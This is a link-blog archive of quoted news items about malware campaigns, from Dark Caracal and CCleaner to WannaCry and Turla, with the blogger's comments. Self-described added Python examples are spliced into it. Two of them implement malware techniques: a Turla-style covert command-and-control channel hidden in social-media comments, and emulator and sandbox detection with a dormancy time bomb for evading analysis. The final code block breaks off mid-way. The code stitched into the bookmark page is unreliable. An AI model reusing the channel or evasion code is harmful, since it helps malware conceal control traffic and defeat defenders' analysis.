EFF and Lookout uncover new malware espionage campaign infecting thousands around the world • Electronic Frontier Foundation
<p>The Electronic Frontier Foundation (EFF) and mobile security company Lookout have uncovered a new malware espionage campaign infecting thousands of people in more than 20 countries. Hundreds of gigabytes of data have been stolen, primarily through mobile devices compromised by fake secure messaging clients.

The trojanized apps, including Signal and WhatsApp, function like the legitimate apps and send and receive messages normally. However, the fake apps also allow the attackers to take photos, retrieve location information, capture audio, and more.

The threat, called Dark Caracal by EFF and Lookout researchers, may be a nation-state actor and appears to employ shared infrastructure which has been linked to other nation-state actors.</p>


Fear not, though: it <a href="https://www.lookout.com/info/ds-dark-caracal-ty">works</a> through phishing links which then direct people to third-party app stores. (None hit iOS, for this reason.) Stick to the legit stuff, you're OK.

Still amazing that people do this, ten years after mobile app stores arrived.
apps  malware  android 
january 2018 by charlesarthur
Warning: new undetectable DNS hijacking malware targeting Apple macOS users • The Hacker News
Mohit Kumar:
<p>A security researcher has <a href="https://objective-see.com/blog/blog_0x26.html">revealed</a> details of a new piece of undetectable malware targeting Apple's Mac computers—reportedly first macOS malware of 2018.

Dubbed OSX/MaMi, an unsigned Mach-O 64-bit executable, the malware is somewhat similar to DNSChanger malware that infected millions of computers across the world in 2012.

DNSChanger malware typically changes DNS server settings on infected computers, allowing attackers to route internet traffic through malicious servers and intercept sensitive information.

It first appeared on the Malwarebytes forum, where a user posted a query about unknown malware that had infected his friend's computer and silently changed the DNS settings on the infected macOS to 82.163.143.135 and 82.163.142.137.

After looking at the post, ex-NSA hacker Patrick Wardle analysed the malware and found that it is indeed a 'DNS Hijacker,' which also invokes security tools to install a new root certificate in an attempt to intercept encrypted communications as well.</p>


So check your DNS settings. (Preferences, Network, Advanced, DNS). Also not detected at that point by any of 59 popular antivirus programs.
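For checking more than one machine, the same settings are readable from the command line. The script below is an added example (not from The Hacker News or from Objective-See's analysis): it parses what `networksetup -listallnetworkservices` and `networksetup -getdnsservers <service>` print and flags any resolver not on an allowlist you maintain. The sample output is constructed; the two flagged addresses are the ones the article reports MaMi setting, and the allowlist is a placeholder to replace with your own resolvers.

```python
"""Audit macOS DNS resolvers against an allowlist.

Added example, not from the article or the Objective-See analysis.
Sample command output is constructed; ALLOWED_RESOLVERS is a placeholder.
"""
import ipaddress
import platform
import subprocess
from typing import Dict, List, Set

# Placeholder: the resolvers you expect on your own machines.
ALLOWED_RESOLVERS: Set[str] = {"192.168.1.1", "1.1.1.1", "9.9.9.9"}

# Constructed sample output, in the format the two commands use.
SAMPLE_SERVICES = (
    "An asterisk (*) denotes that a network service is disabled.\n"
    "Wi-Fi\n"
    "Thunderbolt Ethernet\n"
    "*Bluetooth PAN\n"
)
SAMPLE_DNS_OUTPUT: Dict[str, str] = {
    "Wi-Fi": "82.163.143.135\n82.163.142.137\n",
    "Thunderbolt Ethernet": "There aren't any DNS Servers set on Thunderbolt Ethernet.\n",
}


def parse_services(text: str) -> List[str]:
    """Return enabled network service names (a leading '*' marks disabled ones)."""
    names = []
    for line in text.splitlines()[1:]:   # first line is the asterisk legend
        line = line.strip()
        if line and not line.startswith("*"):
            names.append(line)
    return names


def parse_dns_servers(text: str) -> List[str]:
    """Return manually configured resolvers; an empty list means DHCP-supplied."""
    servers = []
    for line in text.splitlines():
        line = line.strip()
        try:
            servers.append(str(ipaddress.ip_address(line)))
        except ValueError:
            continue   # the "There aren't any DNS Servers set" message
    return servers


def audit(dns_by_service: Dict[str, List[str]], allowed: Set[str]) -> Dict[str, List[str]]:
    """Map each service to the resolvers on it that are not allowlisted."""
    findings = {}
    for service, servers in dns_by_service.items():
        bad = [s for s in servers if s not in allowed]
        if bad:
            findings[service] = bad
    return findings


def collect_live() -> Dict[str, List[str]]:
    """Query the running machine (macOS only; networksetup exists nowhere else)."""
    if platform.system() != "Darwin":
        raise RuntimeError("networksetup is a macOS tool")

    def run(*args: str) -> str:
        return subprocess.run(["networksetup", *args], capture_output=True,
                              text=True, check=True).stdout

    services = parse_services(run("-listallnetworkservices"))
    return {svc: parse_dns_servers(run("-getdnsservers", svc)) for svc in services}


if __name__ == "__main__":
    try:
        data = collect_live()
    except RuntimeError:   # not on a Mac: fall back to the constructed sample
        data = {svc: parse_dns_servers(SAMPLE_DNS_OUTPUT.get(svc, ""))
                for svc in parse_services(SAMPLE_SERVICES)}
    for service, bad in audit(data, ALLOWED_RESOLVERS).items():
        print(f"{service}: unexpected resolver(s) {', '.join(bad)}")
```

Caveat: `networksetup -getdnsservers` lists only resolvers set by hand, so an empty result means "whatever DHCP handed out", not "clean"; `scutil --dns` shows the resolvers actually in use. And since MaMi also installs a root certificate, the DNS check is only half the audit: `security find-certificate -a -p /Library/Keychains/System.keychain` lists the certificates in the system keychain and `security dump-trust-settings -d` shows any admin-level trust overrides, which is where an unexpected root would show up.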
security  malware  mac 
january 2018 by charlesarthur
Cloudflare bans sites for using cryptocurrency miners • TorrentFreak
"Andy":
<p>It all began with The Pirate Bay, which quietly added a Javascript cryptocurrency miner to its main site, something that first manifested itself as a large spike in CPU utilization on the machines of visitors.

The stealth addition to the platform, which its operators later described as a test, was extremely controversial. While many thought of the miner as a cool and innovative way to generate revenue in a secure fashion, a vocal majority expressed a preference for permission being requested first, in case they didn’t want to participate in the program.

Over the past couple of weeks, several other sites have added similar miners, some which ask permission to run and others that do not. While the former probably aren’t considered problematic, the latter are now being viewed as a serious problem by an unexpected player in the ecosystem.

TorrentFreak has learned that popular CDN service Cloudflare, which is often criticized for not being harsh enough on ‘pirate’ sites, is actively suspending the accounts of sites that deploy cryptocurrency miners on their platforms.</p>


Good. That's an amazing abuse. Ads are bad, but they tend to load and sit there. (OK, maybe not video.) Actively parasitising someone else's CPU crosses a line.
browser  malware  bitcoin  javascript 
october 2017 by charlesarthur
CCleaner malware outbreak is much worse than it first appeared • Ars Technica
Dan Goodin:
<p>Because the CCleaner backdoor was active for 31 days, the total number of infected computers is "likely at least in the order of hundreds," researchers from Avast, the antivirus company that acquired CCleaner in July, said in their own analysis published Thursday.

From September 12 to September 16, the highly advanced second stage was reserved for computers inside 20 companies or Web properties, including Cisco, Microsoft, Gmail, VMware, Akamai, Sony, and Samsung. The 20 computers that installed the payload were from eight of those targeted organizations, Avast said, without identifying which ones. Again, because the data covers only a small fraction of the time the backdoor was active, both Avast and Talos believe the true number of targets and victims was much bigger.

The second stage appears to use a completely different control network. The complex code is heavily obfuscated and uses anti-debugging and anti-emulation tricks to conceal its inner workings. Craig Williams, a senior technology leader and global outreach manager at Talos, said the code contains a "fileless" third stage that's injected into computer memory without ever being written to disk, a feature that further makes analysis difficult. Researchers are in the process of reverse engineering the payload to understand precisely what it does on infected networks…

…The group behind the attack remains unknown. Talos was able to confirm an observation, first made by AV provider Kaspersky Lab, that some of the code in the CCleaner backdoor overlaps with a backdoor used by a hacking group known both as APT 17 and Group 72. Researchers have tied this group to people in China.</p>


This is a hell of a thing.
malware  ccleaner 
september 2017 by charlesarthur
The Kronos needle in the AlphaBay haystack • emptywheel
"emptywheel" (the site has multiple authors) points out that it's odd how quickly the FBI alighted on the Kronos malware sale on AlphaBay, given how much else there was to look at:
<p>look at the overall numbers FBI boasted for AlphaBay when it announced its takedown on July 20, nine days after the indictment targeting Hutchins.
<p>AlphaBay reported that it serviced more than 200,000 users and 40,000 vendors. Around the time of takedown, the site had more than 250,000 listings for illegal drugs and toxic chemicals, and more than 100,000 listings for stolen and fraudulent identification documents, counterfeit goods, malware and other computer hacking tools, firearms, and fraudulent services. By comparison, the Silk Road dark market—the largest such enterprise of its kind before it was shut down in 2013—had approximately 14,000 listings.

The operation to seize AlphaBay’s servers was led by the FBI and involved the cooperative efforts of law enforcement agencies in Thailand, the Netherlands, Lithuania, Canada, the United Kingdom, and France, along with the European law enforcement agency Europol.

“Conservatively, several hundred investigations across the globe were being conducted at the same time as a result of AlphaBay’s illegal activities,” Phirippidis said. “It really took an all-hands effort among law enforcement worldwide to deconflict and protect those ongoing investigations.”</p>


Of the 40,000 vendors charged within a month of takedown, of the 250K drug listings and the 100K fraudulent services listings, the guy who sold Kronos once for $2,000 (whom <a href="https://www.forbes.com/sites/thomasbrewster/2017/08/04/marcus-hutchins-case-kronos-malware-not-hot-in-cybercrime/#7bfd9a9a345c">Tom Fox-Brewster thinks might be a guy named VinnyK</a>) — and by virtue of American conspiracy laws, Hutchins — were among the first 20 or so known to be charged for using AlphaBay.</p>


All the indicators are that someone who was nabbed in the AlphaBay sting was somehow implicated in Kronos, and put Hutchins's name forward as a co-conspirator. It's a way to get the feds off your back.
malware  kronos  alphabay 
august 2017 by charlesarthur
Briton who stopped WannaCry attack arrested over separate malware claims • The Guardian
Alex Hern and Sam Levin:
<p>Marcus Hutchins, the 23-year-old British security researcher who was credited with stopping the WannaCry outbreak in its tracks by discovering a hidden “kill switch” for the malware, has been arrested by the FBI over his alleged involvement in another malicious software targeting bank accounts.

According to an indictment released by the US Department of Justice on Thursday, Hutchins is accused of having helped to create, spread and maintain the banking trojan Kronos between 2014 and 2015.

The Kronos malware was spread through emails with malicious attachments such as compromised Microsoft Word documents, and hijacks credentials like internet banking passwords to let its user steal money with ease.

Hutchins, who is indicted with another unnamed co-defendant, stands accused of six counts of hacking-related crimes as a result of his alleged involvement with Kronos. “Defendant Marcus Hutchins created the Kronos malware,” the indictment, filed on behalf of the eastern district court of Wisconsin, alleges.

Hutchins, better known online by his handle MalwareTech, had been in Las Vegas for the annual Def Con hacking conference, the largest of its kind in the world. He was at the airport preparing to leave the country when he was arrested, after more than a week in the city without incident.</p>


This is utterly weird. <a href="https://www.documentcloud.org/documents/3912524-Kronos-Indictment-R.html">Here's the indictment</a>, via <a href="https://motherboard.vice.com/en_us/article/pagn7v/malwaretech-wannacry-indictment-kronos-malware">Motherboard</a>. It refers to (but obscures the name of) someone else who was apparently in Wisconsin. It sounds like the other person has fingered Hutchins. Whether that's true is a different matter.
malwaretech  malware  kronos  hacking 
august 2017 by charlesarthur
Misconceptions about Android — Tech Specs
Daniel Matte has a few points to make, of which this is probably the key one:
<p>Malware on Android is often portrayed as an ever-growing, constant crisis. While Android does have tons of major security concerns, the overall issue is still hugely overstated.

Firstly, the term malware can mean absolutely anything. The vast majority of stories about mobile security spread FUD and sensationalism, to the detriment of readers. I won’t pretend to be a security expert, but even imperfect sandboxing probably goes a long way compared to the completely unsandboxed traditional PC application environments. It doesn’t seem clear to me whether Android or macOS is more secure overall, for example. As with many things, it probably depends.

There is however an extreme case: the Chinese market. Because Android is out of Google’s control in China, the OS genuinely is a security nightmare in the country. I remember waiting for a flight at the airport in Beijing and watching with amusement as some seemingly low-threat app started downloading itself onto my phone over the air. All I did was merely have Wi-Fi on; I hadn’t attempted to connect to any access points.</p>


You should also note his points about force-quitting Android apps, touch latency, and why people perceive its scrolling and similar as "janky".
android  malware 
july 2017 by charlesarthur
Petya.2017 is a wiper, not a ransomware • Comae Technologies
Matt Suiche:
<p>We believe the ransomware was in fact a lure to control the media narrative, especially after the WannaCry incidents, to attract the attention on some mysterious hacker group rather than a nation-state attacker like we have seen in the past in cases that involved wipers such as Shamoon.

Lately, the number of attacks against Ukraine increased from Power Grids being shut down to the car a top military intelligence officer exploding yesterday — the day Petya.2017 infected Ukraine.

The fact of pretending to be a ransomware while being in fact a nation-state attack — especially since WannaCry proved that widely spread ransomware isn't financially profitable — is in our opinion a very subtle way for the attacker to control the narrative of the attack.</p>


A "wiper" simply trashes the first sector (or more) of the boot disc, so you can't get at your files. Petya's email address has been shut down too. The emerging narrative is that this is North Korea or Russia: the latter would be aiming at zapping systems in Ukraine, where the first infections were spotted.
petya  malware  ransomware 
june 2017 by charlesarthur
Android malware hid in Google Play apps to inject code into system runtime libraries • Graham Cluley
<p>A type of Android malware known as Dvmap hid in apps available on the Google Play Store in order to inject malicious code into system runtime libraries.

So far, Kaspersky has detected at least 50,000 downloads of the malware, which hid in apps like the puzzle game "colourblock" on Google's Play Store…

Upon initial installation, the malware attempts to gain root privileges and to install some modules, including a malicious app called com.qualcmm.timeservices. It then launches a start file to check the Android system version and determine which runtime system library to patch…

…The malicious ip file is capable of disabling "VerifyApps," [Google's app verification daemon] changing system settings to allow the installation of apps from third-party marketplaces, and grant com.qualcmm.timeservices Device Administrator rights. This app can then use those rights to download archives and connect to its C&C.

To protect themselves against Dvmap, users should install an anti-virus solution onto their devices. They should also be careful about what apps they install onto their phones. As Dvmap and other threats prove, malware can hide in apps available on Google's Play Store.</p>


Downloading modules seen as hazardous.
android  malware 
june 2017 by charlesarthur
Russian malware communicates by leaving comments in Britney Spears's Instagram account • Boing Boing
Cory Doctorow:
<p>A key weakness in malicious software is the "Command and Control" (C&C) system: a central server that the malware-infected systems contact to receive updates and instructions, and to send stolen data. Anti-malware researchers like to reverse engineer malicious code, discover the C&C server's address, and then shut it down or blacklist it from corporate routers.

Turla is an "advanced persistent threat" hacking group based in Russia with a long history of attacking states in ways that advance Russian state interests -- suggesting that they are either a part of the Russian espionage system, or contracting to it.

A new analysis by Eset shows that Turla is solving its C&C problems by using Britney Spears' Instagram account as a cut-out for its C&C servers. Turla moves the C&C server around, then hides the current address of the server in encrypted comments left on Britney Spears's image posts. The compromised systems check in with Spears's Instagram whenever they need to know where the C&C server is currently residing.</p>


This is like the <a href="https://en.wikipedia.org/wiki/Three_Days_of_the_Condor">subplot of Three Days of the Condor</a>, but for the computer world.
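What makes a dead drop like this work is that the resolver on the infected machine never needs to know the server address in advance: it only needs a rule for picking the right comment and a rule for reading it. The block below is an added example (not ESET's analysis code and not Turla's) of the mechanism ESET described: the implant fetches the comments on a public post, selects one by a custom hash, and extracts a short URL with a regular expression that keys on characters hidden behind an invisible zero-width joiner. The selector hash, the regex, the shortener domain and the comments are my assumptions, chosen to show analysts the shape of the technique and the check that exposes it, not to reproduce Turla's encoding.

```python
"""Dead-drop resolver: a C2 address hidden in social-media comments.

Added example; not ESET's or Turla's code. The selector hash, regex,
shortener prefix and comments are assumptions made for illustration.
"""
import hashlib
import re
from typing import List, Optional

ZWJ = "\u200d"                         # zero-width joiner: renders as nothing
SELECTOR_BYTE = 183                    # assumed: the value the resolver looks for
SHORTENER = "https://short.example/"   # assumed prefix the resolver prepends
HIDDEN_CHAR = re.compile(ZWJ + r"[#@](\w)")   # a joiner glued to a # or @


def selector(comment: str) -> int:
    """Assumed selector: first byte of SHA-256 over the comment text."""
    return hashlib.sha256(comment.encode("utf-8")).digest()[0]


def hide(fragment: str, cover: str) -> str:
    """Encode a URL fragment into a comment that reads as cover text plus hashtags.

    Each payload character becomes ZWJ + '#' + char: a reader sees
    ordinary-looking one-letter hashtags, the regex sees tagged characters.
    A trailing nonce is varied until the selector matches, which is how the
    operator marks the carrier comment among the decoys.
    """
    tags = "".join(f" {ZWJ}#{c}" for c in fragment)
    for nonce in range(1, 100000):
        candidate = f"{cover}{tags} {nonce}"
        if selector(candidate) == SELECTOR_BYTE:
            return candidate
    raise RuntimeError("no candidate matched the selector")


def extract(comment: str) -> str:
    """Pull the hidden characters out of a comment (empty string if none)."""
    return "".join(HIDDEN_CHAR.findall(comment))


def resolve(comments: List[str]) -> Optional[str]:
    """What the implant does: find the selected comment and rebuild the C2 URL."""
    for comment in comments:
        if selector(comment) == SELECTOR_BYTE:
            fragment = extract(comment)
            if fragment:          # a decoy may collide on the hash but carries nothing
                return SHORTENER + fragment
    return None


def looks_like_dead_drop(comment: str) -> bool:
    """Defender's check: visible text never needs a joiner directly before # or @."""
    return bool(HIDDEN_CHAR.search(comment))


# Constructed comments: two decoys and one carrier.
COMMENTS = [
    "love this #tbt",
    "so pretty!! #queen #icon",
    hide("aB3xY7q", "great show last night #tour"),
]

if __name__ == "__main__":
    print("resolved C2:", resolve(COMMENTS))
    for c in COMMENTS:
        print(looks_like_dead_drop(c), repr(c))
```

The defender-side point is the last function: an analyst looking at captured comments (or a platform looking at its own data) does not need the hash or the URL to spot the channel, only the fact that a zero-width character sits directly in front of a `#` or `@`, something no human typist produces. The same idea, a format-level anomaly rather than a known indicator, is how you would hunt for the next account used this way.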
security  britneyspears  bot  malware 
june 2017 by charlesarthur
Fireball malware infects 20% of corporate networks worldwide • Infosecurity Magazine
Tara Seals:
<p>A browser-hijacker called Fireball has ignited concern, having already infected more than 250 million computers worldwide, and 20% of corporate networks globally. 

According to Check Point, it takes over target web browsers, turning them into zombies. However, Fireball also can be turned into a fully functioning malware downloader, and is capable of executing any code on the victim machines. That means it can carry out a wide range of actions, including stealing credentials and loading ransomware.

For now, it seems focused on adware. Fireball manipulates victims’ browsers and turns their default search engines and home pages into fake search engines, which simply redirect the queries to either yahoo.com or Google.com to generate ad revenue. According to Alexa’s web traffic data, 14 of these fake search engines are among the top 10,000 websites, with some of them occasionally reaching the top 1,000.

Fireball also installs plug-ins and additional configurations to boost its advertisement activity.

“It’s run by a Chinese digital marketing agency, called Rafotech,” Check Point noted in an analysis. “Rafotech carefully walks along the edge of legitimacy, knowing that adware distribution is not considered a crime like malware distribution is. Many companies provide software or services for free, and make their profits by harvesting data or presenting advertisements. Once a client agrees to the install of extra features or software to his/her computer, it is hard to claim malicious intent on behalf of the provider.”</p>
malware  browser 
june 2017 by charlesarthur
Android malware 'Judy' hits as many as 36.5 million phones • Fortune.com
David Morris:
<p>While the actual extent of the malicious code’s spread is unknown, Checkpoint says it may have reached as many as 36.5 million users, making it potentially the most widely-spread malware yet found on Google Play. Google removed the apps after being notified by Checkpoint.

The malicious apps primarily included a series of casual cooking and fashion games under the “Judy” brand, a name borrowed for the malware itself. The nefarious nature of the programs went unnoticed in large part, according to Checkpoint, because its malware payload was downloaded from a non-Google server after the programs were installed. The code would then use the infected phone to click on Google ads, generating fraudulent revenue for the attacker.

The infection may have spread even more widely than Checkpoint’s estimates, since not all of the extensive line of “Judy” apps are included on Checkpoint’s tally – it’s missing Fashion Judy: Magic Girl Style and Fashion Judy: Masquerade Style, among others. All installments of the series do appear to have been pulled from Google Play.

The “Judy” apps were published by an apparently Korean entity known as ENISTUDIO. However, iterations of the same attack were found on a handful of apps from other publishers.</p>
android  malware 
may 2017 by charlesarthur
Hacked in Translation: from subtitles to complete takeover • Check Point Blog
<p>Our research reveals a new possible attack vector, using a completely overlooked technique in which the cyberattack is delivered when movie subtitles are loaded by the user’s media player. These subtitles repositories are, in practice, treated as a trusted source by the user or media player; our research also reveals that those repositories can be manipulated and be made to award the attacker’s malicious subtitles a high score, which results in those specific subtitles being served to the user. This method requires little or no deliberate action on the part of the user, making it all the more dangerous.

Unlike traditional attack vectors, which security firms and users are widely aware of, movie subtitles are perceived as nothing more than benign text files. This means users, Anti-Virus software, and other security solutions vet them without trying to assess their real nature, leaving millions of users exposed to this risk.

The attack vector relies heavily on the poor state of security in the way various media players process subtitle files and the large number of subtitle formats. To begin with, there are over 25 subtitle formats in use, each with unique features and capabilities. Media players often need to parse together multiple subtitle formats to ensure coverage and provide a better user experience, with each media player using a different method. Like other, similar situations which involve fragmented software, this results in numerous distinct vulnerabilities… To date, we tested and found vulnerabilities in four of the most prominent media players: VLC, Kodi, Popcorn Time and Stremio</p>


Check Point puts the number potentially at risk in the "hundreds of millions". There's a video too:

<iframe width="560" height="315" src="https://www.youtube.com/embed/vYT_EGty_6A" frameborder="0" allowfullscreen></iframe>

A long time ago, the then video producer for Nine Inch Nails showed me how he had written a firmware hack so that playing a DVD video single (that's how long ago it was) would load a program that would take over your DVD. But he never distributed it, because the record company pointed out they could all be done for hacking. Nowadays, of course, you download your own destruction.
security  malware  subtitle 
may 2017 by charlesarthur
Exclusive: Hackers hit Russian bank customers, planned international cyber raids • Reuters
Jack Stubbs:
<p>Russian cyber criminals used malware planted on Android mobile devices to steal from domestic bank customers and were planning to target European lenders before their arrest, investigators and sources with knowledge of the case told Reuters.

Their campaign raised a relatively small sum by cyber-crime standards - more than 50 million roubles ($892,000) - but they had also obtained more sophisticated malicious software for a modest monthly fee to go after the clients of banks in France and possibly a range of other western nations.

Russia's relationship to cyber crime is under intense scrutiny after U.S. intelligence officials alleged that Russian hackers had tried to help Republican Donald Trump win the U.S. presidency by hacking Democratic Party servers.

The Kremlin has repeatedly denied the allegation.

The gang members tricked the Russian banks' customers into downloading malware via fake mobile banking applications, as well as via pornography and e-commerce programs, according to a report compiled by cyber security firm Group-IB which investigated the attack with the Russian Interior Ministry.

The criminals - 16 suspects were arrested by Russian law enforcement authorities in November last year - infected more than a million smartphones in Russia, on average compromising 3,500 devices a day, Group-IB said.</p>


This seems to have been taking advantage of flaws in Android OS, but without more detail it's hard to be sure. Killer quote from a Sberbank spokeswoman:
<p>"It isn't clear which specific group is being referred to here because the fraudulent scheme involving Android OS (operating system) viruses is widespread in Russia and Sberbank has effectively combated it for an extensive period of time."</p>
russia  malware  virus  banking 
may 2017 by charlesarthur
Another large-scale cyberattack underway, experts say • The Japan Times
<p>Instead of completely disabling an infected computer by encrypting data and seeking a ransom payment, Adylkuzz uses the machines it infects to “mine” in a background task a virtual currency, Monero, and transfer the money created to the authors of the virus.

Virtual currencies such as Monero and Bitcoin use the computers of volunteers to record transactions. They are said to “mine” for the currency and are occasionally rewarded with a piece of it.

<a href="https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar">Proofpoint said in a blog post</a> that symptoms of the attack include loss of access to shared Windows resources and degradation of PC and server performance, effects that some users may not notice immediately.

“As it is silent and doesn’t trouble the user, the Adylkuzz attack is much more profitable for the cyber criminals. It transforms the infected users into unwitting financial supporters of their attackers,” said Godier.

Proofpoint said it has detected infected machines that have transferred several thousand dollars worth of Monero to the creators of the virus.

The firm believes Adylkuzz has been on the loose since at least May 2, and perhaps even since April 24, but due to its stealthy nature was not immediately detected.

“We don’t know how big it is” but “it’s much bigger than WannaCry,” said Robert Holmes, Proofpoint’s vice president for email products.

A U.S. official on Tuesday put the number of computers infected by WannaCry at over 300,000.</p>


This is from last week but points to something interesting. ProofPoint says that *this* one, which preceded Wannacry, shuts down SMB networking - and so could have limited the spread of Wannacry. Does that imply that they're separate groups behind the two? Or that Wannacry was an attempt to monetise the same attack more quickly?
wannacry  ransomware  bitcoin  malware 
may 2017 by charlesarthur
How to accidentally stop a global cyber attack • MalwareTech
The anonymous @malwaretech, who registered the domain that was hard-coded into the Wannacry ransomware:
<p>one thing that’s important to note is the actual registration of the domain was not on a whim. My job is to look for ways we can track and potentially stop botnets (and other kinds of malware), so I’m always on the lookout to pick up unregistered malware control server (C2) domains. In fact I registered several thousand of such domains in the past year.

Our standard model goes something like this.

1) Look for unregistered or expired C2 domains belonging to active botnets and point it to our sinkhole (a sinkhole is a server designed to capture malicious traffic and prevent control of infected computers by the criminals who infected them).

2) Gather data on the geographical distribution and scale of the infections, including IP addresses, which can be used to notify victims that they’re infected and assist law enforcement.

3) Reverse engineer the malware and see if there are any vulnerabilities in the code which would allow us to take-over the malware/botnet and prevent the spread or malicious use, via the domain we registered.
In the case of WannaCrypt, step 1, 2 and 3 were all one and the same, I just didn’t know it yet.

A few seconds after the domain had gone live I received a DM from a Talos analyst asking for the sample I had which was scanning SMB hosts, which I provided. Humorously at this point we had unknowingly killed the malware so there was much confusion as to why he could not run the exact same sample I just ran and get any results at all. As curious as this was, I was pressed for time and wasn’t able to investigate, because now the sinkhole servers were coming dangerously close to their maximum load.</p>


His full post includes his concern that by registering the domain, he'd actually <em>activated</em> the malware. It's quite a tale. Plus he has praise for the UK's National Cyber Security Centre and the FBI, among others.
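The two halves of the story above, the kill-switch check the worm performed and the first two steps of the sinkhole workflow, as an added example written for this page (it is not MalwareTech's code). The domain name is a placeholder, the `fetch` callable stands in for the worm's HTTP request, and the sinkhole log lines are constructed, not real captures:

```python
"""Added example: kill-switch semantics plus sinkhole triage.  Domain, fetch
callable and log records are all constructed for illustration."""
from collections import Counter
from typing import Callable, Dict, Iterable, List, Tuple

# Hypothetical placeholder; the real hard-coded domain is deliberately not used.
KILL_SWITCH_DOMAIN = "unregistered-placeholder.invalid"


def should_detonate(domain: str, fetch: Callable[[str], bool]) -> bool:
    """Inverse logic of a kill switch: the malware tries to reach the
    hard-coded domain and only proceeds when that request FAILS.  Registering
    the domain (and answering on it) therefore stops every new infection that
    can reach it.  `fetch` returns True when the domain answers."""
    try:
        reachable = fetch(domain)
    except Exception:          # DNS failure, timeout: looks "unregistered"
        reachable = False
    return not reachable


# One record per connection to the sinkhole: timestamp, source IP, country.
SinkholeHit = Tuple[str, str, str]

SAMPLE_SINKHOLE_LOG = """\
# ts                  source_ip     country   (constructed records, not real data)
2017-05-12T15:08:01Z  203.0.113.10  GB
2017-05-12T15:08:03Z  198.51.100.7  ES
2017-05-12T15:08:05Z  203.0.113.10  GB
2017-05-12T15:08:09Z  203.0.113.42  GB
2017-05-12T15:08:11Z  192.0.2.55    RU
"""


def parse_hits(text: str) -> List[SinkholeHit]:
    """Step 1's output: every connection the sinkhole accepted."""
    hits: List[SinkholeHit] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, ip, country = line.split()[:3]
        hits.append((ts, ip, country))
    return hits


def summarise(hits: Iterable[SinkholeHit]) -> Tuple[Dict[str, Tuple[str, str]], Counter]:
    """Step 2: de-duplicate by source IP (one infected host reconnects many
    times) and count infections per country.  `first_seen` is the list you
    would hand to a CERT for victim notification."""
    first_seen: Dict[str, Tuple[str, str]] = {}
    for ts, ip, country in hits:
        first_seen.setdefault(ip, (ts, country))
    per_country = Counter(country for _, country in first_seen.values())
    return first_seen, per_country


if __name__ == "__main__":
    # Before registration nothing answers on the domain: the worm keeps going.
    print(should_detonate(KILL_SWITCH_DOMAIN, lambda d: False))   # True
    # Once the sinkhole is live the request succeeds: the worm exits.
    print(should_detonate(KILL_SWITCH_DOMAIN, lambda d: True))    # False
    victims, per_country = summarise(parse_hits(SAMPLE_SINKHOLE_LOG))
    print(len(victims), dict(per_country))   # 4 {'GB': 2, 'ES': 1, 'RU': 1}
```

Note what the check in `should_detonate` implies: any failure to reach the domain counts as "unregistered", so a host whose outbound DNS or HTTP is blocked still detonates even after the sinkhole is up. Registering the domain protects only the machines that can actually reach it, which is why the sinkhole's load mattered so much in the account above.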
security  malware  ransomware 
may 2017 by charlesarthur
8,400 new Android malware samples every day • G DATA
<p> G DATA security experts discovered over 750,000 new Android malware apps in the first quarter of 2017. That represents almost 8,400 new malware instances every day.

Following a new negative overall record of over 3.2 million new Android malware files in 2016, the year 2017 was off to a slower start in comparison with same quarter of the previous year. G DATA security experts counted 750,000 new malware files in the first quarter of 2017. The malware figures remained the same in the fourth quarter of 2016. The threat level for users with smartphones and tablets with an Android operating system remains high. In all, the G DATA security experts expect around 3.5 million new Android malware apps for 2017…

…A comprehensive security solution is becoming more and more important for smartphones and tablets. The security app should include a virus scanner that checks the mobile device for Trojans, viruses and other malware. Furthermore it should include surfing and phishing protection to secure users against dangerous emails and websites.</p>


Hmm. A huge flow of Android malware, but very little evidence of infections. How many people run antivirus on their Android phone? (I'm guessing close to zero.) How many get infected? I'm guessing ditto on that. The risks are real, but tiny.
android  malware 
may 2017 by charlesarthur
Super Free Music Player in Google Play is malware: a technical analysis • Naked Security
<p>SophosLabs has identified the following characteristics of Super Free Music Player:

• The dropper downloaded from Google Play is named com.superfreemusic.songapp. 
• The payload is decrypted and planted on Android devices by the dropper.

First, the dropper starts a service called com.hole.content.Erpbiobuft to decrypt and drop the payload. It then continues running this service every hour.

The dropper then uses dynamic code and reflection to load the payload method (com.fb.content.core.enter).

To avoid detection from Google Play, the payload will verify if a device is an emulator by checking several properties such as the emulator phone number (15555215554, 15555215556…) and specific strings such as (/system/lib/libc_malloc_debug_qemu.so, /sys/qemu_trace …). Moreover, it is able to check if a popular Android research sandbox, TaintDroid, is used. Also, another time bomb is used to avoid detection.</p>


It's that last point which is the eye-opener: if Google Play's detection systems all work on emulation, then this is a problem.
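The emulator and sandbox checks the analysis lists, reimplemented as an added example for this page (it is not SophosLabs' or the sample's code, which is Java running on Android). The phone numbers and qemu file paths are the ones quoted above; the build properties, the TaintDroid class name, the one-day dormancy period and both device snapshots are assumptions added here:

```python
"""Added example: emulator/sandbox fingerprinting and a time bomb, over a
constructed snapshot of device state."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Set

# Indicators quoted in the analysis.
EMULATOR_PHONE_NUMBERS = {"15555215554", "15555215556"}
QEMU_ARTIFACTS = {"/system/lib/libc_malloc_debug_qemu.so", "/sys/qemu_trace"}
# Further indicators assumed here (well-known emulator build properties and
# the TaintDroid runtime class); they are not mentioned in the write-up.
EMULATOR_PROPS = {"ro.kernel.qemu": "1", "ro.hardware": "goldfish"}
TAINTDROID_CLASS = "dalvik.system.Taint"


@dataclass
class DeviceSnapshot:
    phone_number: str
    files: Set[str]          # paths that exist on the device
    props: Dict[str, str]    # what `getprop` would report
    classes: Set[str]        # classes loadable from the runtime
    installed_at: datetime   # when the dropper was installed


def emulator_indicators(dev: DeviceSnapshot) -> List[str]:
    """Every artefact that marks `dev` as an emulator or research sandbox.
    Read the other way round, it is the list a sandbox operator must hide."""
    hits: List[str] = []
    if dev.phone_number in EMULATOR_PHONE_NUMBERS:
        hits.append("emulator phone number " + dev.phone_number)
    for path in sorted(QEMU_ARTIFACTS & dev.files):
        hits.append("qemu artefact " + path)
    for key, value in EMULATOR_PROPS.items():
        if dev.props.get(key) == value:
            hits.append(f"build property {key}={value}")
    if TAINTDROID_CLASS in dev.classes:
        hits.append("TaintDroid runtime present")
    return hits


def time_bomb_armed(dev: DeviceSnapshot, now: datetime,
                    delay: timedelta = timedelta(days=1)) -> bool:
    """The 'time bomb': stay dormant until `delay` has passed since install.
    A sandbox that runs a sample for minutes never gets here unless it fakes
    the clock.  (The one-day delay is an assumption.)"""
    return now - dev.installed_at >= delay


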